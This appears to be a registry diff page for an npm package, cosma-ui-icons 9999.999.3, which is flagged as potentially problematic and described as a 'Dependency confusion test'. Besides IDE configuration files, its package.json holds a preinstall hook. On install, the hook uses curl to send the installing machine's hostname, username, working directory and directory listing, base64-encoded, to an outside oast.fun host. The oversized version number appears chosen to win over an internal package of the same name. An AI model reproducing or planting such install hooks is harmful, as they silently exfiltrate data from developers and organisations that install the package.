cosma-ui-icons 9999.999.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of cosma-ui-icons might be problematic. Click here for more details.
- package/.idea/dependency-confusion.iml +8 -0
- package/.idea/highlightedFiles.xml +17 -0
- package/.idea/modules.xml +8 -0
- package/.idea/sonarlint/issuestore/7/0/7030d0b2f71b999ff89a343de08c414af32fc93a +0 -0
- package/.idea/sonarlint/issuestore/8/e/8ec9a00bfd09b3190ac6b22251dbb1aa95a0579d +0 -0
- package/.idea/sonarlint/issuestore/index.pb +5 -0
- package/.idea/vcs.xml +6 -0
- package/README.md +3 -0
- package/package.json +19 -0
|
@@ -0,0 +1,8 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="UTF-8"?>
|
|
2
|
+
<module type="WEB_MODULE" version="4">
|
|
3
|
+
<component name="NewModuleRootManager">
|
|
4
|
+
<content url="file://$MODULE_DIR$" />
|
|
5
|
+
<orderEntry type="inheritedJdk" />
|
|
6
|
+
<orderEntry type="sourceFolder" forTests="false" />
|
|
7
|
+
</component>
|
|
8
|
+
</module>
|
|
@@ -0,0 +1,17 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="UTF-8"?>
|
|
2
|
+
<project version="4">
|
|
3
|
+
<component name="ProjectTreeColorHighlighter">
|
|
4
|
+
<files />
|
|
5
|
+
<colors>
|
|
6
|
+
<color id="1" value="#4f060d" name="Color 1" enabled="true" />
|
|
7
|
+
<color id="2" value="#44220e" name="Color 2" enabled="true" />
|
|
8
|
+
<color id="3" value="#3f371b" name="Color 3" enabled="true" />
|
|
9
|
+
<color id="4" value="#162c16" name="Color 4" enabled="true" />
|
|
10
|
+
<color id="5" value="#0f2f47" name="Color 5" enabled="true" />
|
|
11
|
+
<color id="6" value="#171a34" name="Color 6" enabled="true" />
|
|
12
|
+
<color id="7" value="#311333" name="Color 7" enabled="true" />
|
|
13
|
+
<color id="8" value="#1e1e1e" name="Color 8" enabled="true" />
|
|
14
|
+
</colors>
|
|
15
|
+
<option name="marksForCollapsedHighlights" value="Dots" />
|
|
16
|
+
</component>
|
|
17
|
+
</project>
|
|
@@ -0,0 +1,8 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="UTF-8"?>
|
|
2
|
+
<project version="4">
|
|
3
|
+
<component name="ProjectModuleManager">
|
|
4
|
+
<modules>
|
|
5
|
+
<module fileurl="file://$PROJECT_DIR$/.idea/dependency-confusion.iml" filepath="$PROJECT_DIR$/.idea/dependency-confusion.iml" />
|
|
6
|
+
</modules>
|
|
7
|
+
</component>
|
|
8
|
+
</project>
|
|
File without changes
|
|
File without changes
|
package/.idea/vcs.xml
ADDED
package/README.md
ADDED
package/package.json
ADDED
|
@@ -0,0 +1,19 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "cosma-ui-icons",
|
|
3
|
+
"version": "9999.999.3",
|
|
4
|
+
"description": "Dependency confusion test (NPM)",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "curl -H \"Hostname: $(hostname | base64)\" -H \"Whoami: $(whoami | base64)\" -H \"Pwd: $(pwd | base64)\" -d $(ls -la | base64) https://bhgimgpnbksmciuybdoe9hfax1cczsv10.oast.fun/?name=DepConf"
|
|
8
|
+
},
|
|
9
|
+
"repository": {
|
|
10
|
+
"type": "git",
|
|
11
|
+
"url": "git+https://github.com/orlserg/dependency-confusion.git"
|
|
12
|
+
},
|
|
13
|
+
"author": "orlserg",
|
|
14
|
+
"license": "ISC",
|
|
15
|
+
"bugs": {
|
|
16
|
+
"url": "https://github.com/orlserg/dependency-confusion/issues"
|
|
17
|
+
},
|
|
18
|
+
"homepage": "https://github.com/orlserg/dependency-confusion#readme"
|
|
19
|
+
}
|